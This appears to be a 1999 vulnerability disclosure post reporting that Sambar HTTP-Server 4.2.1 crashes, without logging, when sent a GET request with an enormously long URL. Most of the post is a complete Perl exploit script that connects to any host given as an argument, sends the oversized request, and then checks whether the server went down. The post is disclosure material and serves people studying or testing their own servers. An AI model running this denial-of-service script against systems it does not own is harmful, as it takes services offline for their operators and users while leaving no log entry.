While testing the security of the Sambar HTTP-Server I found it vulnerable
to a simple DOS attack. Sending a "GET XXXX(...a lot of Xs..)XXXX HTTP/1.0"
crashes the Server. It will die WITHOUT logging the attack.

My testing-environment:

Sambar 4.2.1
M$IE 5.0 (de)
Windows 95 C (de)

Sample exploit code follows.

Dennis Conrad (dennis@linuxstart.com)

--------------------

#!/usr/bin/perl

#########
# Sample DOS against the Sambar HTTP-Server
# This was tested against Sambar 4.2.1 running on Windows95 C
# This attack will NOT be logged! Only use it to determine if
# your Server is vulnerable!
#
# Dennis Conrad (dennis@linuxstart.com)
#

use IO::Socket;

print "+++++++++\n";
print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n";
print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n";

if ($#ARGV != 0) {
        die "+ Please give the host address as argument\n"
}

opensocket ("\n");
print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";
close $remote;

opensocket ("\n+ The server seemed to be vulnerable to this attack\n");
close $remote;
die "+ The server does not seem to be vulnerable to this attack\n";

sub opensocket {
        $remote = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $ARGV[0],
                PeerPort => "http(80)",
        ) || die "+ Can't open http-port on $ARGV[0]$_[0]";
        $remote->autoflush(1)
}

# EOF
--------------------------
Do you do Linux? :)
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com